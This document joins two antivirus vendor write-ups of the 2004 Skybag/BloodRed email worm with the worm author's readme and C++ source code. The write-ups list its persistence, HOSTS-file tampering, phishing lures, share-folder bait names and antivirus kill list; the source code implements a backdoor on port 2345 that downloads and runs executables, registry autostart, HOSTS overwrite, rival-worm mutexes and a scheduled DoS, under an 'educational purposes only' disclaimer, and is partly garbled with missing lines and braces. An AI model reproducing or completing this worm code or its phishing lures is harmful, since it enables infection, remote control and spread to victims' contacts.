Email-Worm.Win32.Skybag.

a
Aliases
Email-Worm.Win32.Skybag.a (Kaspersky Lab) is also known as: I-Worm.Skybag.a (Kaspersky Lab),
W32/Netsky.ah@MM (McAfee), W32.Netsky.AE@mm (Symantec), Win32.HLLP.Skybag (Doctor Web),
W32/Yaha-G (Sophos), Worm:Win32/SKybag.A@mm (RAV), WORM_YAHA.H (Trend Micro),
Worm/Skybag.A (H+BEDV), W32/Netsky.AJ@mm (FRISK), Win32:Skybag (ALWIL), I-
Worm/Netsky.AF (Grisoft), Win32.Skybag.A@mm (SOFTWIN), Worm.Skybag.A (ClamAV),
W32/Skybag.A.worm (Panda), Win32/Skybag.A (Eset)
Description added Nov 12 2004
Behavior Email Worm
Technical details

This worm spreads via the Internet as an attachment to infected messages, and via local and file sharing
networks. The worm sends itself to email addresses harvested from the infected machine.

The worm itself is a Windows PE EXE file approximately 205 KB in size.

Installation
When installing, the worm copies itself to the Windows system directory as:
bloodred.exe
Windows_kernel32.exe

It also creates the following files in the Windows system directory:

base64exe.sys
base64zip.sys
frun.txt

The worm creates a file called 'bloodred.zip' in the Windows root directory.

Skybag then registers itself in the system registry:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Kernel"="%System%\Windows_kernel32.exe"

This ensures that the worm will be launched each time the system is rebooted.

Skybag then displays the following dialogue box:

'Windows encountered an error reading the file'

Propagation via email

The worm sends itself to all email addresses harvested from the victim computer. The worm looks for email
addresses in Outlook Address Book and in files with the following extensions:
adb
asp
dbx
doc
htm
html
jsp
rtf

http://www.viruslist.com/en/viruses/encyclopedia?virusid=64524
txt
xml

The worm uses the recipient's SMTP server to send messages to all harvested addresses.

Messages are not sent to addresses which contain the following text strings:
@avp
@fsecure
@hotmail
@microsoft
@mm
@msn
@noreply
@norman
@norton
@panda
@sopho
@symantec
@virusli

Infected messages:
Sender's address (chosen at random from the list below):
administration@
management@
Server@
service@
userhelp@

Subject (chosen at random from the list below):

Detailed Information
Email Account Information
Server Error
URGENT PLEASE READ!
Urgent Update!
User Info
User Information

Message body (chosen at random from the list below):

Our server is experiencing some latency in our email service.
The attachment contains details on how your account will be affected.

Due to recent internet attacks, your Email account security is being upgraded. The attachment
contains more details

Our Email system has received reports of your account flooding email servers. There is more
information on this matter in the attachment

We regret to inform you that your account has been hijacked and used for illegal purposes. The
attachment has more information about what has happened.

Your Email account information has been removed from the system due to inactivity. To renew
your account information refer to the attachment

There is urgent information in the attachment regarding your Email account

Attachment name (chosen at random from the list below):

Account_Information
http://www.viruslist.com/en/viruses/encyclopedia?virusid=64524
Details
Gift
Information
Update
Word_Document

with one of the following extensions:

.cmd
.pif
.scr
.zip

Propagation via local and file-sharing networks

The worm searches the computer for folders where the name contains the word 'Share' and copies itself
several times to each folder found, under the following names:
ACDSEE10.exe
Adobe Photoshop Full Version.exe
Battlefield 1942.exe
Brianna banks and jenna jameson.mpeg ..exe
Britney spears naked.jpeg .exe
Cisco source code.zip ..exe
DVD Xcopy xpress.exe
jenna jameson screensaver.scr
Kazaa Lite.zip ..exe
NETSKY SOURCE CODE.zip ..exe
Norton AntiVirus 2004.exe
Opera Registered version.exe
Snood new version.exe
Teen Porn.mpeg ..exe
Visual Studio.NET.zip .exe
WinAmp 6.exe
Windows crack.zip ..exe
Windows Longhorn Beta.exe
WINDOWS SOURCE CODE.zip ..exe
WinRAR.exe

Payload
Skybag.a closes the Windows Task Manager application, if it is open.

The worm overwrites the %System%\DRIVERS\ETC\HOSTS file with the following text:
127.0.0.1 www.norton.com
127.0.0.1 norton.com
127.0.0.1 yahoo.com
127.0.0.1 www.yahoo.com
127.0.0.1 microsoft.com
127.0.0.1 www.microsoft.com
127.0.0.1 windowsupdate.com
127.0.0.1 www.windowsupdate.com
127.0.0.1 www.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 www.nai.com
127.0.0.1 nai.com
127.0.0.1 www.ca.com
127.0.0.1 ca.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 www.sophos.com
127.0.0.1 www.google.com
127.0.0.1 google.com

If the infected computer's system date is November 15, 2004 or later, the worm attempts to conduct DoS
attacks against www.kazaa.com

Also the worm attempts to block the work of a number of firewalls and antivirus monitors.

http://www.viruslist.com/en/viruses/encyclopedia?virusid=64524
I-Worm.Skybag.a opens and then monitors TCP port 2345 to listen for commands.

http://www.viruslist.com/en/viruses/encyclopedia?virusid=64524
W32.Netsky.AE@mm
Risk Level 2: Low
Printer Friendly Page

SUMMARY
TECHNICAL DETAILS
REMOVAL

Discovered: October 25, 2004

Updated: February 13, 2007 12:29:03 PM
Also Known As: I-Worm.Skybag.a [Kaspersky], W32/Netsky.ah@MM [McAfee]
Type: Worm
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows
Server 2003, Windows XP

When W32.Netsky.AE@mm is executed, it does the following:

1. Copies itself as the following files:

%System%\bloodred.exe
%System%\Windows_kernel32.exe

Note: %System% is a variable that refers to the System folder. By default this is
C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or
C:\Windows\System32 (Windows XP).

2. Creates a mutex named "~~~Bloodred~~~owns~~~you~~~xoxo~~~2004", so that only one

instance of the worm runs on the computer.

3. Creates the following files, which contain a copy of the worm:

%Windir%\bloodred.zip (A zipped copy of the worm. The file name within is Urgent_Info.pif.)
%System%\base64exe.sys (detected as W32.Netsky.AE@mm!enc)
%System%\base64zip.sys (detected as W32.Netsky.AE@mm!enc)

Note: %Windir% is a variable that refers to the Windows installation folder. By default, this is
C:\Windows or C:\Winnt.

4. Creates the file %System%\frun.txt

5. Adds the value:

"Microsoft Kernel"="%System%\Windows_kernel32.exe"

to the registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

so that the worm runs when you start Windows.

6. Overwrites the %System%\DRIVERS\ETC\HOSTS file with the following text:

127.0.0.1 www.norton.com

http://www.symantec.com/security_response/writeup.jsp?docid=2004-102522-4640-99
 127.0.0.1 norton.com
127.0.0.1 yahoo.com
127.0.0.1 www.yahoo.com
127.0.0.1 microsoft.com
127.0.0.1 www.microsoft.com
127.0.0.1 windowsupdate.com
127.0.0.1 www.windowsupdate.com
127.0.0.1 www.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 www.nai.com
127.0.0.1 nai.com
127.0.0.1 www.ca.com
127.0.0.1 ca.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 www.sophos.com
127.0.0.1 www.google.com
127.0.0.1 google.com

which prevents access to several network-security related Web sites.

7. Creates the following mutexes:

'D'r'o'p'p'e'd'S'k'y'N'e't'
SkynetNotice
SkynetSasserVersionWithPingFast
JumpallsNlsTillt
Jobaka3l
Jobaka3
MuXxXxTENYKSDesignedAsTheFollowerOfSkynet-D
S-k-y-n-e-t--A-n-t-i-v-i-r-u-s-T-e-a-m
SkyNet-Sasser
AdmSkynetJKIS003
[SkyNet.cz]SystemsMutex
LK[SkyNet.cz]SystemsMutex
Netsky AV Guard
MI[SkyNet.cz]SystemsMutex
KO[SkyNet.cz]SystemsMutex
SkYnEt_AVP
Rabbo
Rabbo_Mutex
Bgl_*L*o*o*s*e*
_-oO]xX|-S-k-y-N-e-t-|Xx[Oo-_
_-oOaxX|-+S+-+k+-+y+-+N+-+e+-+t+-|XxKOo-_
89845848594808308439858307378280987074387498739847
Protect_USUkUyUnUeUtU_Mutex
SyncMutex_USUkUyUnUeUtU
SyncMutex_USUkUyUnUeUtUU
_-=oOOSOkOyONOeOtOo=-_
NetDy_Mutex_Psycho
____--->>>>U<<<<--____
(S)(k)(y)(N)(e)(t)
AdmMoodownJKIS003

8. May display a message box with the following text:

Windows encountered an error reading the file

9. Terminates large number of antivirus and security applications. See the "Processes" section at the end
of the Technical Details for a complete list.

10. Listens on TCP port 2345 for commands from a remote attacker.

http://www.symantec.com/security_response/writeup.jsp?docid=2004-102522-4640-99
 11. If the attacker sends an executable file to the infected computer, the worm saves it in the %System%
folder as an .exe file with a name made up of three to twelve random, lowercase letters, and then
executes it.

12. Performs a DoS against www.kazaa.com, if the infected computer's system date is set to November
15, 2004 or later.

13. Copies itself to any folders that have names containing the string "shar" on the drives C through X,
using one of the following names:

Visual Studio.NET.zip .exe

DVD Xcopy xpress.exe
Britney spears naked.jpeg .exe
Teen Porn.mpeg ..exe
Windows crack.zip ..exe
Kazaa Lite.zip ..exe
NETSKY SOURCE CODE.zip ..exe
Battlefield 1942.exe
Norton AntiVirus 2004.exe
Brianna banks and jenna jameson.mpeg ..exe
Snood new version.exe
Opera Registered version.exe
jenna jameson screensaver.scr
WINDOWS SOURCE CODE.zip ..exe
Windows Longhorn Beta.exe
WinRAR.exe
WinAmp 6.exe
Cisco source code.zip ..exe
Adobe Photoshop Full Version.exe
ACDSEE10.exe

14. Closes the Windows Task Manager application, if it is open.

15. Gathers email addresses from the Windows address book and from files with the following extensions:

.adb
.asp
.dbx
.doc
.htm
.html
.jsp
.rtf
.txt
.xml

16. Uses its own SMTP engine to send itself to all the email addresses that it finds. The email has the
following characteristics:

From: (One of the following)

Server@<recipient domain>
administration@<recipient domain>
management@<recipient domain>
service@<recipient domain>
userhelp@<recipient domain>

where <recipient domain> is the domain of the email address the worm is sending the email to.
http://www.symantec.com/security_response/writeup.jsp?docid=2004-102522-4640-99
 For example, if the email address is john@example.com, the email may have a From: line with
the email address service@example.com.

Subject: (One of the following)

Email Account Information
User Information
Detailed Information
URGENT PLEASE READ!
User Info
Server Error
Urgent Update!

Message body: (One of the following)

Our server is experiencing some latency in our email service.
The attachment contains details on how your account will be affected.
Due to recent internet attacks, your Email account security is being upgraded.
The attachment contains more details
Our Email system has received reports of your account flooding email servers.
There is more information on this matter in the attachment
We regret to inform you that your account has been hijacked and used for illegal
purposes.
The attachment has more information about what has happened.
Your Email account information has been removed from the system due to inactivity.
To renew your account information refer to the attachment
There is urgent information in the attachment regarding your Email account

Attachment: (One of the following)

Account_Information
Word_Document
Gift
Information
Details
Update

followed by a .cmd, .pif, or .scr extension.

The worm may also send a zipped copy of itself as an attachment.

17. The worm avoids sending itself to email addresses that contain any of the following strings:

@hotmail
@fsecure
@virusli
@noreply
@norton
@norman
@mm
@sopho
@msn
@microsoft
@avp
@panda
@symantec

Processes
The worm will attempt to terminate any of the following processes:

http://www.symantec.com/security_response/writeup.jsp?docid=2004-102522-4640-99
 AGENTSVR.EXE
ANTI-TROJAN.EXE
ANTIVIRUS.EXE
ANTS.EXE
APIMONITOR.EXE
APLICA32.EXE
APVXDWIN.EXE
ATCON.EXE
ATGUARD.EXE
ATRO55EN.EXE
ATUPDATER.EXE
ATWATCH.EXE
AUPDATE.EXE
AUTODOWN.EXE
AUTOTRACE.EXE
AUTOUPDATE.EXE
AVCONSOL.EXE
AVGSERV9.EXE
AVLTMAIN.EXE
AVPUPD.EXE
AVSYNMGR.EXE
AVWUPD32.EXE
AVXQUAR.EXE
AVprotect9x.exe
Au.exe
BD_PROFESSIONAL.EXE
BIDEF.EXE
BIDSERVER.EXE
BIPCP.EXE
BIPCPEVALSETUP.EXE
BISP.EXE
BLACKD.EXE
BLACKICE.EXE
BOOTWARN.EXE
BORG2.EXE
BS120.EXE
CCAPP.exe
CDP.EXE
CFGWIZ.EXE
CFIADMIN.EXE
CFIAUDIT.EXE
CFINET.EXE
CFINET32.EXE
CLEAN.EXE
CLEANER.EXE
CLEANER3.EXE
CLEANPC.EXE
CMGRDIAN.EXE
CMON016.EXE
CPD.EXE
CPF9X206.EXE
CPFNT206.EXE
CV.EXE
CWNB181.EXE
CWNTDWMO.EXE
D3dupdate.exe
DEFWATCH.EXE
http://www.symantec.com/security_response/writeup.jsp?docid=2004-102522-4640-99
 DEPUTY.EXE
DPF.EXE
DPFSETUP.EXE
DRWATSON.EXE
DRWEBUPW.EXE
ENT.EXE
ESCANH95.EXE
ESCANHNT.EXE
ESCANV95.EXE
EXANTIVIRUS-CNET.EXE
FAST.EXE
FIREWALL.EXE
FLOWPROTECTOR.EXE
FP-WIN_TRIAL.EXE
FRW.EXE
FSAV.EXE
FSAV530STBYB.EXE
FSAV530WTBYB.EXE
FSAV95.EXE
GBMENU.EXE
GBPOLL.EXE
GUARD.EXE
HACKTRACERSETUP.EXE
HTLOG.EXE
HWPE.EXE
IAMAPP.EXE
IAMSERV.EXE
ICLOAD95.EXE
ICLOADNT.EXE
ICMON.EXE
ICSSUPPNT.EXE
ICSUPP95.EXE
ICSUPPNT.EXE
IFW2000.EXE
IPARMOR.EXE
IRIS.EXE
JAMMER.EXE
KAVLITE40ENG.EXE
KAVPERS40ENG.EXE
KERIO-PF-213-EN-WIN.EXE
KERIO-WRL-421-EN-WIN.EXE
KERIO-WRP-421-EN-WIN.EXE
KILLPROCESSSETUP161.EXE
LDPRO.EXE
LOCALNET.EXE
LOCKDOWN.EXE
LOCKDOWN2000.EXE
LSETUP.EXE
LUALL.EXE
LUCOMSERVER.EXE
LUINIT.EXE
MCAGENT.EXE
MCUPDATE.EXE
MFW2EN.EXE
MFWENG3.02D30.EXE
MGUI.EXE
MINILOG.EXE
http://www.symantec.com/security_response/writeup.jsp?docid=2004-102522-4640-99
 MOOLIVE.EXE
MRFLUX.EXE
MSCONFIG.EXE
MSINFO32.EXE
MSSMMC32.EXE
MU0311AD.EXE
NAV80TRY.EXE
NAVAPW32.EXE
NAVDX.EXE
NAVSTUB.EXE
NAVW32.EXE
NC2000.EXE
NCINST4.EXE
NDD32.EXE
NEOMONITOR.EXE
NETARMOR.EXE
NETINFO.EXE
NETMON.EXE
NETSCANPRO.EXE
NETSPYHUNTER-1.2.EXE
NETSTAT.EXE
NISSERV.EXE
NISUM.EXE
NMAIN.EXE
NORTON_INTERNET_SECU_3.0_407.EXE
NPF40_TW_98_NT_ME_2K.EXE
NPFMESSENGER.EXE
NPROTECT.EXE
NSCHED32.EXE
NTVDM.EXE
NUPGRADE.EXE
NVARCH16.EXE
NWINST4.EXE
NWTOOL16.EXE
OSTRONET.EXE
OUTPOST.EXE
OUTPOSTINSTALL.EXE
OUTPOSTPROINSTALL.EXE
PADMIN.EXE
PANIXK.EXE
PAVPROXY.EXE
PCC2002S902.EXE
PCC2K_76_1436.EXE
PCCIOMON.EXE
PCDSETUP.EXE
PCFWALLICON.EXE
PCIP10117_0.EXE
PDSETUP.EXE
PERISCOPE.EXE
PERSFW.EXE
PF2.EXE
PFWADMIN.EXE
PINGSCAN.EXE
PLATIN.EXE
POPROXY.EXE
POPSCAN.EXE
PORTDETECTIVE.EXE
http://www.symantec.com/security_response/writeup.jsp?docid=2004-102522-4640-99
 PPINUPDT.EXE
PPTBC.EXE
PPVSTOP.EXE
PROCEXPLORERV1.0.EXE
PROPORT.EXE
PROTECTX.EXE
PSPF.EXE
PURGE.EXE
PVIEW95.EXE
QCONSOLE.EXE
QSERVER.EXE
RAV8WIN32ENG.EXE
RESCUE.EXE
RESCUE32.EXE
RRGUARD.EXE
RSHELL.EXE
RTVSCN95.EXE
RULAUNCH.EXE
SAFEWEB.EXE
SBSERV.EXE
SD.EXE
SETUPVAMEEVAL.EXE
SETUP_FLOWPROTECTOR_US.EXE
SFC.EXE
SGSSFW32.EXE
SHELLSPYINSTALL.EXE
SHN.EXE
SMC.EXE
SOFI.EXE
SPF.EXE
SPHINX.EXE
SPYXX.EXE
SS3EDIT.EXE
ST2.EXE
SUPFTRL.EXE
SUPPORTER5.EXE
SYMPROXYSVC.EXE
SYSEDIT.EXE
TASKMON.EXE
TAUMON.EXE
TAUSCAN.EXE
TC.EXE
TCA.EXE
TCM.EXE
TDS-3.EXE
TDS2-98.EXE
TDS2-NT.EXE
TFAK5.EXE
TGBOB.EXE
TITANIN.EXE
TITANINXP.EXE
TRACERT.EXE
TRJSCAN.EXE
TRJSETUP.EXE
TROJANTRAP3.EXE
UNDOBOOT.EXE
UPDATE.EXE
http://www.symantec.com/security_response/writeup.jsp?docid=2004-102522-4640-99
 VBCMSERV.EXE
VBCONS.EXE
VBUST.EXE
VBWIN9X.EXE
VBWINNTW.EXE
VCSETUP.EXE
VFSETUP.EXE
VIRUSMDPERSONALFIREWALL.EXE
VNLAN300.EXEVNPC3000.EXE
VPC42.EXE
VPFW30S.EXE
VPTRAY.EXE
VSCENU6.02D30.EXE
VSECOMR.EXE
VSHWIN32.EXE
VSISETUP.EXE
VSMAIN.EXE
VSMON.EXE
VSSTAT.EXE
VSWIN9XE.EXE
VSWINNTSE.EXE
VSWINPERSE.EXE
W32DSM89.EXE
W9X.EXE
WATCHDOG.EXE
WEBSCANX.EXE
WGFE95.EXE
WHOSWATCHINGME.EXE
WINRECON.EXE
WNT.EXE
WRADMIN.EXE
WRCTRL.EXE
WSBGATE.EXE
WYVERNWORKSFIREWALL.EXE
XPF202EN.EXE
ZAPRO.EXE
ZAPSETUP3001.EXE
ZATUTOR.EXE
ZAUINST.EXE
ZONALM2601.EXE
ZONEALARM.EXE
avserve2.exe

http://www.symantec.com/security_response/writeup.jsp?docid=2004-102522-4640-99
About BloodRed v1.txt

BloodRed, my massmailer, C++

...it is a full massmailer written in C++ I am rather pleased that i finally finished it.
Please use your head and dont release it. Here is a list of operations it does:

Copies itself to System Directory as Windows_Kernel32.exe

Overwrites local host file

Encodes itself in base64 format

Creates a zip copy of itself

Registers itself to run every time PC is started (very basic)

Copies itself as commonly downloaded file names to directories containing "shar"

Recursively searches drives C-Y and harvests email addresses

Composes a message with random subject, message, attachment name, attachment extension.

Uses from address of server@[recipient's address], security@[recipient's address], etc.

Gets user's current DNS server and queries it for the MX record of the recipients address
(on Windows 95/98/ME Operating Systems)

Uses DNSAPI.dll to query for MX record of recipient (only on 2000 and XP Operating systems)

Kills most common Antivirus Processes

Starts a DOS attack on a specified date

Kills all instances of Netsky and Sasser

Creates a mutex so only one instance of the virus can run

Finally it starts a backdoor thats able to download executable files, save them to a random
filename in the System Directory, then execute the file

Enjoy it, and please do not release this. Use this code to learn.

by Jackhole
Backdoor.cpp

/*************************
* Opens up port 2345.
* Backdoor that accepts
* remotely sent exe files
* saves them as a random
* filename to system dir
* then executes them :)
*
**************************/
#include <windows.h>
#include <shellapi.h>
#include <stdio.h>
#include <stdlib.h>
#include <winsock.h>
#pragma comment (lib,"ws2_32.lib")
#define BACKLOG 5

#define PORT 2345

void retrieve_file(int sock)

{
int i, j;
HANDLE hFile=NULL;
char path[MAX_PATH], buf[1024];
DWORD dw;

srand(GetTickCount());
char random[MAX_PATH];

int e,d;
d = 3 + (rand() % 10);
for (e=0; e<d; e++)
random[e] = 'a' + (rand() % 26);

char fslash[260]="//";
GetSystemDirectory(path,sizeof(path));
strcat(path,fslash);
strcat(path,random);
strcat(path,".exe");

hFile = CreateFile(path, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS,

FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == NULL || hFile == INVALID_HANDLE_VALUE) {
hFile = NULL;
goto drop;
}

for (i=0;;) {
j = recv(sock, buf, sizeof(buf), 0);
if (j <= 0) break;
i += j;
WriteFile(hFile, buf, j, &dw, 0);

}
CloseHandle(hFile);
ShellExecute(NULL,"open",path,NULL,NULL,SW_SHOW);
closesocket(sock);
return;
Backdoor.cpp

drop: closesocket(sock);
if (hFile != NULL)
return;
}

DWORD _stdcall listening(LPVOID pv)

int sin_size;
int socket1;
int socket_accept;
struct sockaddr_in server;
struct sockaddr_in client;
socket1 = socket(AF_INET, SOCK_STREAM, 0);
server.sin_family = AF_INET;
server.sin_port = htons(PORT);
server.sin_addr.s_addr = INADDR_ANY;
bind(socket1,(struct sockaddr *)&server,sizeof(struct sockaddr));
listen(socket1,BACKLOG);
while(1){
sin_size = sizeof(struct sockaddr_in);
socket_accept = accept(socket1, (struct sockaddr *)&client,&sin_size);

retrieve_file(socket_accept);
return 0;

}
}
Base64.cpp

#define WIN32_LEAN_AND_MEAN
#include <stdio.h>
//base64 encoding algorithm. Used for the massmailer's attachment
void EncodeBase64(char *strFile, char *szPath)
{
char Alphabet[64]={ 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' };

unsigned char bytes[3];

unsigned int incr,total,total1=0;
unsigned char char1;

FILE* fin = fopen(strFile,"rb");

if(fin==NULL)return;
FILE* fout = fopen(szPath,"w");
incr = -1;
total = 0;
while(!feof(fin))
{
total1++;
incr++;
if(incr==3)
{
incr = -1;
char1 = bytes[0] >> 2;
fprintf(fout,"%c",Alphabet[char1]);
char1 = ((bytes[0] << 6) | (bytes[1] >> 2));
char1 = char1 >> 2;
fprintf(fout,"%c",Alphabet[char1]);
char1 = bytes[1] << 4;
char1 = char1 >> 2;
char1 = char1 | (bytes[2] >> 6);
fprintf(fout,"%c",Alphabet[char1]);
char1 = bytes[2] << 2;
char1 = char1 >> 2;
fprintf(fout,"%c",Alphabet[char1]);
total+=4;
}
else fscanf(fin,"%c",&bytes[incr]);
if(total==76)
{
total = 0;
fprintf(fout,"\n");
}
}

if (incr==1)
{
char1 = bytes[0] >> 2;
fprintf(fout,"%c",Alphabet[char1]);
char1 = ((bytes[0] << 6) | 0);
char1 = char1 >> 2;
fprintf(fout,"%c==",Alphabet[char1]);
}
if (incr==2)
{
char1 = bytes[0] >> 2;
fprintf(fout,"%c",Alphabet[char1]);
Base64.cpp

char1 = ((bytes[0] << 6) | (bytes[1] >> 2));

char1 = char1 >> 2;
fprintf(fout,"%c",Alphabet[char1]);
char1 = bytes[1] << 4;
char1 = char1 >> 2;
char1 = char1 | 0;
fprintf(fout,"%c=",Alphabet[char1]);
}
fclose(fin);
fclose(fout);

}
BloodRed.cpp

/**************************************************
* Bloodred - Written by Jackhole
*
* Project History:
* + Main idea - November 2003
* + Initial design - December 2003
* + First half of worm completed - February 2004
* + Total recode of first half of worm - June 2004
* The main reason I did this was the original virus
* had many problems massmailing and the exe infector
* didn't quite work
*
* + First executable infector finished, later posted
* rohitab.com - August 2004
* + Worm Completion 12:42 A.M. September 21, 2004
*
* PLEASE READ THIS STATEMENT: I AM NOT HELD
* RESPONSIBLE FOR ANY ACTIONS YOU TAKE WITH THIS
* SOFTWARE. THIS IS FOR EDUCATIONAL PURPOSES ONLY
* YOU AND ONLY YOU ARE RESPONSIBLE!
*
*
* TODO: Add email queue
* Add more elaborative payloads
* Create a better exe infector (mine infected .SCRs
* which is essentialy the same thing)
* Add more replication mechanisms
* Add more Processes to AV kill list
* ...
*
* Happy Coding!
* P.S. Releasing viruses is very stupid and it is
* punishable under applicable law.
**************************************************/

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winsock.h>
#include "backdoor.h"
#include "KillProc.h"
#include "Harvester.h"
#include "ZipIt.h"
#include "Base64.h"
#include "DOS.h"
#include <stdio.h>
#pragma comment (lib,"ws2_32.lib")

//message that is compiled into exe

static const char *szMsg[] = {

"Live life as it is or live life as it comes. "

"Written by Jackhole"

};
//kill all netsky and sasser variants
void kill_skynet()
{
CreateMutexA(NULL, TRUE, "AdmMoodownJKIS003");
CreateMutexA(NULL, TRUE, "(S)(k)(y)(N)(e)(t)");
CreateMutexA(NULL, TRUE, "____--->>>>U<<<<--____");
BloodRed.cpp

CreateMutexA(NULL, TRUE, "NetDy_Mutex_Psycho");

CreateMutexA(NULL, TRUE, "_-=oOOSOkOyONOeOtOo=-_");
CreateMutexA(NULL, TRUE, "SyncMutex_USUkUyUnUeUtUU");
CreateMutexA(NULL, TRUE, "SyncMutex_USUkUyUnUeUtU");
CreateMutexA(NULL, TRUE, "Protect_USUkUyUnUeUtU_Mutex");
CreateMutexA(NULL, TRUE, "89845848594808308439858307378280987074387498739847");
CreateMutexA(NULL, TRUE, "_-oOaxX|-+S+-+k+-+y+-+N+-+e+-+t+-|XxKOo-_");
CreateMutexA(NULL, TRUE, "_-oO]xX|-S-k-y-N-e-t-|Xx[Oo-_");
CreateMutexA(NULL, TRUE, "Bgl_*L*o*o*s*e*");
CreateMutexA(NULL, TRUE, "NetDy_Mutex_Psycho");
CreateMutexA(NULL, TRUE, "Rabbo_Mutex");
CreateMutexA(NULL, TRUE, "Rabbo");
CreateMutexA(NULL, TRUE, "SkYnEt_AVP");
CreateMutexA(NULL, TRUE, "KO[SkyNet.cz]SystemsMutex");
CreateMutexA(NULL, TRUE, "MI[SkyNet.cz]SystemsMutex");
CreateMutexA(NULL, TRUE, "Netsky AV Guard");
CreateMutexA(NULL, TRUE, "LK[SkyNet.cz]SystemsMutex");
CreateMutexA(NULL, TRUE, "[SkyNet.cz]SystemsMutex");
CreateMutexA(NULL, TRUE, "AdmSkynetJKIS003");
CreateMutexA(NULL, TRUE, "SkyNet-Sasser");
CreateMutexA(NULL, TRUE, "S-k-y-n-e-t--A-n-t-i-v-i-r-u-s-T-e-a-m");
CreateMutexA(NULL, TRUE, "MuXxXxTENYKSDesignedAsTheFollowerOfSkynet-D");
CreateMutexA(NULL, TRUE, "Jobaka3");
CreateMutexA(NULL, TRUE, "Jobaka3l");
CreateMutexA(NULL, TRUE, "JumpallsNlsTillt");
CreateMutexA(NULL, TRUE, "SkynetSasserVersionWithPingFast");
CreateMutexA(NULL, TRUE, "SkynetNotice");
CreateMutexA(NULL, TRUE, "'D'r'o'p'p'e'd'S'k'y'N'e't'");

//overwrite localhost file

void host(void)
{

char host[MAX_PATH];

GetSystemDirectory(host, sizeof(host));

strcat(host, "\\Drivers\\ETC\\HOSTS");

const char* buffer = "127.0.0.1 www.norton.com 127.0.0.1 norton.com 127.0.0.1 yahoo.com

127.0.0.1 www.yahoo.com 127.0.0.1 microsoft.com 127.0.0.1 www.microsoft.com 127.0.0.1
windowsupdate.com 127.0.0.1 www.windowsupdate.com 127.0.0.1 www.mcafee.com 127.0.0.1
mcafee.com 127.0.0.1 www.nai.com 127.0.0.1 nai.com 127.0.0.1 www.ca.com 127.0.0.1 ca.com
127.0.0.1 liveupdate.symantec.com 127.0.0.1 www.sophos.com 127.0.0.1 www.google.com
127.0.0.1 google.com";

DWORD byte;
HANDLE hFile = CreateFile(host, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
BOOL bSuccess = WriteFile ( hFile, buffer, strlen(buffer), &byte, NULL);
CloseHandle(hFile);

void bldred_install()
{
BloodRed.cpp

char pathname[256];
char windir[MAX_PATH];
char bldred_instpath[MAX_PATH];

GetSystemDirectory(windir, sizeof(windir));
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);

strcat(windir, "\\Windows_kernel32.exe");
CopyFile(pathname,windir,0);

lstrcpy(bldred_instpath,windir);

char buffer[60];
unsigned long size = sizeof(buffer);
strcpy(buffer, bldred_instpath);
HKEY software;
HKEY mykey;
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\",&software);
RegCreateKey(software,"Run",&mykey);
RegSetValueEx(mykey,"Microsoft Kernel",NULL,REG_SZ,(LPBYTE)buffer,size);
RegCloseKey(mykey);
RegCloseKey(software);

int bldred_mutex()
{
CreateMutexA(NULL, TRUE, "~~~Bloodred~~~owns~~~you~~~xoxo~~~2004");
if (GetLastError() == ERROR_ALREADY_EXISTS)
ExitProcess(0);
return 0;
}
//display fake error message only once. If it can't find frun.txt then thats when it
displays the message
void msg()
{

char host[MAX_PATH];
GetSystemDirectory(host, sizeof(host));
strcat(host, "\\frun.txt");
FILE* fin;
fin = fopen(host,"rb");
if (fin==NULL)
MessageBox(NULL,"Windows encountered an error reading the file","Error",MB_OK|MB_ICONERROR);
const char* buffer = "Here's Johnny :)"; //just a message within frun.txt
DWORD byte;
HANDLE hFile = CreateFile(host, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
BOOL bSuccess = WriteFile (hFile, buffer, strlen(buffer), &byte, NULL);
CloseHandle(hFile);

}
void bldred_mail_install()
{

char systemdir[100];
char systemdir2[100];
char systemdir3[100];

GetSystemDirectory(systemdir,sizeof(systemdir));
GetSystemDirectory(systemdir2,sizeof(systemdir2));
BloodRed.cpp

GetSystemDirectory(systemdir3,sizeof(systemdir3));
strcat(systemdir,"\\bloodred.exe");
strcat(systemdir2,"\\base64zip.sys");
strcat(systemdir3,"\\base64exe.sys");
char buf3[260];
char windir[260];
GetWindowsDirectory(windir,sizeof(windir));
GetModuleFileName(NULL,buf3,MAX_PATH);
CopyFile(buf3,systemdir,0);
strcat(windir,"\\bloodred.zip");
zip_store(buf3,windir,"Urgent_Info.pif");
EncodeBase64(windir,systemdir2);
EncodeBase64(windir,systemdir3);
}

//if it's past october 11th 2004 perform the DOS attack against kazaa.com, those damn
// spyware writers.
int chk_dos_date()
{
static const SYSTEMTIME termdate = { 2004,10,0,11, 16,38,43 };
FILETIME ftime_c, ftime_f;
GetSystemTimeAsFileTime(&ftime_c);
SystemTimeToFileTime(&termdate, &ftime_f);
if (ftime_c.dwHighDateTime > ftime_f.dwHighDateTime) return 1;
if (ftime_c.dwHighDateTime < ftime_f.dwHighDateTime) return 0;
if (ftime_c.dwLowDateTime > ftime_f.dwLowDateTime) return 1;
return 0;
}

void bldred_main()

DWORD pl;
DWORD tid;

endAvSoft();
//if the date is passed the 11th create the dos attack thread
if(chk_dos_date()) CreateThread(0, 0, DOSATTACK, NULL, 0, &tid);
bldred_mail_install();
bldred_mutex();
CreateThread(0, 0, listening, NULL, 0, &pl);
msg();
kill_skynet();
bldred_install();
host();
harvest_main();

//VIRUS ENTRY POINT. WITHOUT THIS, THE VIRUS WON'T RUN, DUH!
